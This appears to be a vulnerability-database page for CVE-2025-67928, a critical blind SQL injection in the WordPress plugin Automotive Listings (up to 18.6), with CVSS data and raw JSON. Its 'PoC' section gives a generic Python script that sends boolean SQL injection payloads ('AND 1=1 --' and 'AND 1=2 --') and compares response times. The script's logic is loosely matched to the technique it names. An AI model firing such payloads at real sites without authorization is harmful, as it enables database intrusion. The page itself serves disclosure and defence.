Security Vulnerability Report
中文
CVE-2025-67928 CVSS 9.3 CRITICAL

CVE-2025-67928

Published: 2026-01-08 10:15:52
Last Modified: 2026-04-27 18:16:50

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themesuite Automotive Listings automotive allows Blind SQL Injection.This issue affects Automotive Listings: from n/a through <= 18.6.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Automotive Listings插件 所有版本 <= 18.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Generic SQL Injection Testing Example (Educational Purpose Only) # DO NOT use this code to test systems without authorization import requests import time def test_sql_injection(url, param_name): """ Educational example showing how SQL injection tests work. This is for understanding only - always get authorization before testing. """ # Test payload for boolean-based blind injection true_payload = f"' AND 1=1 --" false_payload = f"' AND 1=2 --" headers = { 'User-Agent': 'Security Scanner' } # Test with true condition data = {param_name: true_payload} start = time.time() response = requests.post(url, data=data, headers=headers, timeout=10) true_time = time.time() - start # Test with false condition data = {param_name: false_payload} start = time.time() response = requests.post(url, data=data, headers=headers, timeout=10) false_time = time.time() - start # If times differ significantly, potential SQL injection if abs(true_time - false_time) > 2: return 'Potential SQL Injection Vulnerability Detected' return 'No obvious SQL injection detected' # NOTE: Always use authorized security testing tools like sqlmap with proper authorization

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67928", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.863", "lastModified": "2026-04-27T18:16:49.987", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themesuite Automotive Listings automotive allows Blind SQL Injection.This issue affects Automotive Listings: from n/a through <= 18.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/automotive/vulnerability/wordpress-automotive-listings-plugin-18-6-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}